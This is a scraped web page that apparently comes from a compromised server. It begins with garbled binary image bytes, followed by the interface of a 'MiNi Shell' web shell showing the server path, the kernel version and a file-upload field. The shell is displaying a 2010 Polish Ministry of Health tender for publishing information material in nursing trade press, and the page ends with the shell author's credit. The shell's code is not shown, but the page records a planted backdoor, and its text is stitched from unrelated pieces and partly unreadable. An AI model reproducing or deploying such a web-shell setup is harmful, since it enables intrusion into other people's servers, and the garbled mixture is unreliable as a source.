JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100702/193432-N-2010.html

<p class="kh_header"><b>Warszawa: Znak postępowania: ZZP-58/10 PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH.POZ. 1 ÷ 28</b><br>
<b>Numer ogłoszenia: 193432 - 2010; data zamieszczenia: 02.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Zamówień Publicznych przy Ministrze Zdrowia , Al. Jerozolimskie 155/115, 02-326 Warszawa, woj. mazowieckie, tel. 022 8833512, 8833552, faks 022 8833513, 8833552.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zzpprzymz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Znak postępowania: ZZP-58/10 PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH.POZ. 1 ÷ 28.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie usługi polegającej na przygotowaniu, składzie i publikacji materiału informacyjno-promocyjnego, zwanego dalej (Materiałem Informacyjnym), która obejmuje:
a)Przeprowadzenie wywiadu z absolwentem,uczestnikiem studiów pomostowych realizowanych w ramach projektu systemowego pn. Kształcenie zawodowe pielęgniarek i położnych w ramach studiów pomostowych, zwanego dalej Projektem, współfinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki i wykonaniu materiału zdjęciowego z tym absolwentem,uczestnikiem,
b)Skład wywiadu wraz z materiałem zdjęciowym wykonanym przez Wykonawcę.
c)Zamieszczenie informacji o Projekcie systemowym, przygotowanej przez Zamawiającego, 
2.Materiał Informacyjny zostanie opublikowany w bezpłatnej prasie branżowej skierowanej do środowiska pielęgniarek i położnych.
3. Wykonawcą zamówienia może być podmiot będący wydawcą bezpłatnej prasy branżowej skierowanej do środowiska pielęgniarek i położnych, przy czym przedmiotowe wydawnictwo musi być:
a)powszechnie dostępne w Zakładach Opieki Zdrowotnej
b)wydawane co najmniej raz na kwartał
c)kolportowane wśród członków danej Okręgowej Izby Pielęgniarek i Położnych
POZ. 1
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W BIAŁEJ PODLASKIEJ
POZ. 2
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA BESKIDZKIEJ OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W BIELSKO BIAŁEJ
POZ. 3
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W BYDGOSZCZY
POZ. 4
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W CZĘSTOCHOWIE
POZ. 5
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W ELBLĄGU
POZ. 6
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W GORZOWIE WIELKOPOLSKIM
POZ. 7
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W KALISZU
POZ. 8
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W KATOWICACH
POZ. 9
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA ŚWIĘTOKRZYSKIEJ OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W KIELCACH
POZ. 10
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W KONINIE
POZ. 11
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W KOSZALINIE
POZ. 12
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA MAŁOPOLSKIEJ OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W KRAKOWIE
POZ. 13
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W KROŚNIE
POZ. 14
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W LUBLINIE
POZ. 15
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W ŁODZI
POZ. 16
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA NOWOSĄDECKIEJ OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W NOWYM SĄCZU
POZ. 17
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH REGIONU PŁOCKIEGO W PŁOCKU
POZ. 18
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W POZNANIU
POZ. 19
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA  PODKARPACKIEJ OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W PRZEWORSKU
POZ. 20
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W RADOMIU
POZ. 21
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W RZESZOWIE
 POZ. 22
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W SIEDLCACH
POZ. 23
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W SIERADZU
POZ. 24
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA  SZCZECIŃSKIEJ OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W  SZCZECINIE
POZ. 25
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W TORUNIU
POZ. 26
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA WARSZAWSKIEJ OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W WARSZAWIE
POZ. 27
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA DOLNOŚLĄSKIEJ OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH WE WROCŁAWIU
POZ. 28
PUBLIKACJA MATERIAŁU INFORMACYJNEGO W BEZPŁATNEJ PRASIE BRANŻOWEJ SKIEROWANEJ DO ŚRODOWISKA PIELĘGNIAREK I POŁOŻNYCH W OBSZARZE DZIAŁANIA OKRĘGOWEJ IZBY PIELĘGNIAREK I POŁOŻNYCH W ZAMOŚCIU..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.97.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 28.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełniający warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych i nie podlegający wykluczeniu na podstawie art. 24 ustawy P.z.p., oprócz stosownych oświadczeń, o którym mowa poniżej musi złożyć wszystkie wymagane przez zamawiającego dokumenty i oświadczenia dodatkowe</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełniający warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych i nie podlegający wykluczeniu na podstawie art. 24 ustawy P.z.p., oprócz stosownych oświadczeń, o którym mowa poniżej musi złożyć wszystkie wymagane przez zamawiającego dokumenty i oświadczenia dodatkowe</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełniający warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych i nie podlegający wykluczeniu na podstawie art. 24 ustawy P.z.p., oprócz stosownych oświadczeń, o którym mowa poniżej musi złożyć wszystkie wymagane przez zamawiającego dokumenty i oświadczenia dodatkowe</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełniający warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych i nie podlegający wykluczeniu na podstawie art. 24 ustawy P.z.p., oprócz stosownych oświadczeń, o którym mowa poniżej musi złożyć wszystkie wymagane przez zamawiającego dokumenty i oświadczenia dodatkowe</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełniający warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych i nie podlegający wykluczeniu na podstawie art. 24 ustawy P.z.p., oprócz stosownych oświadczeń, o którym mowa poniżej musi złożyć wszystkie wymagane przez zamawiającego dokumenty i oświadczenia dodatkow</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dotyczy pkt - III.4.2 W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:

1. Dokument potwierdzający uprawnienie do reprezentacji osoby podpisującej ofertę w postaci stosownego pełnomocnictwa lub odpisu z właściwego rejestru, z którego wynikają osoby umocowane do reprezentacji podmiotu oraz zasady reprezentacji na zewnątrz(np. odpis z KRS, z którego wynika skład osobowy zarządu spółki i forma reprezentacji tego podmiotu). W przypadku gdy dany podmiot nie podlega wpisowi do rejestru (np. OIPiP) jest on zobowiązany przedstawić uchwałę odpowiedniego organu potwierdzającą odpowiednio wybór danej osoby powołanej do reprezentacji podmiotu na zewnątrz oraz uchwałę dotyczącą przyjętych zasad zaciągania zobowiązań finansowych lub majątkowych.
2.Oświadczenie o wydawaniu przez Wykonawcę bezpłatnego wydawnictwa branżowego na terenie będącym przedmiotem zamówienia i powszechnie dostępnego w Zakładach Opieki Zdrowotnej;

Dokumenty podmiotów zagranicznych:

W przypadku Wykonawcy który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej musi on złożyć dokument/dokumenty zgodnie z § 4 wyżej powołanego Rozporządzenia, odpowiednio do żądanych przez zamawiającego dokumentów od wykonawcy który jest podmiotem polskim.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust 1 ustawy Prawo Zamówień Publicznych Zamawiający zastrzega sobie możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy (warunki takiej ewentualnej zmiany zostaną określone w SIWZ)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zzpprzymz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Zamówień Publicznych przy Ministrze Zdrowia 02-326 Warszawa, Al. Jerozolimskie 155, pok. 102 (I piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2010 godzina 10:00, miejsce: Zakład Zamówień Publicznych przy Ministrze Zdrowia 02-326 Warszawa, Al. Jerozolimskie 155, pok. 102 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z Europejskiego Funduszu Społecznego (EFS) Zamawiający nie przewiduje zawarcia umowy ramowej, ani dokonania wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej oraz nie zamierza ustanawiać dynamicznego systemu zakupów. Oświadczenia, wnioski, zawiadomienia, odwołania oraz informacje Zamawiający i Wykonawcy przekazują pisemnie i faksem. Z zastrzeżeniem, że oświadczenia, wnioski, zawiadomienia, odwołania oraz informacje przekazane za pomocą faksu uważa się za złożone w terminie, jeżeli ich treść dająca się odczytać dotarła do adresata przed upływem wyznaczonego terminu (godziny pracy Zamawiającego 800-1600 w dni robocze) i została niezwłocznie potwierdzona na piśmie przez przekazującego. Zamawiający nie dopuszcza drogi elektronicznej jako formy przekazywania oświadczeń, wniosków, zawiadomień, odwołań oraz informacji pomiędzy Wykonawcą a Zamawiającym. MIEJSCE I TERMIN OTWARCIA OFERT: OTWARCIE OFERT - w siedzibie Zamawiającego pokój 113 ( I piętro ), dnia 19/07/2010r. o godz. 12:00 Do kontaktu z Wykonawcami (w godzinach pracy Zamawiającego tj. 800 - 1600) sprawach j.w. upoważnieni są: Joanna Henkelmann, Marcin Górski - tel. 0-22/883 35 52, pokój 102, e-mail : j.henkelmann@zzpprzymz.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com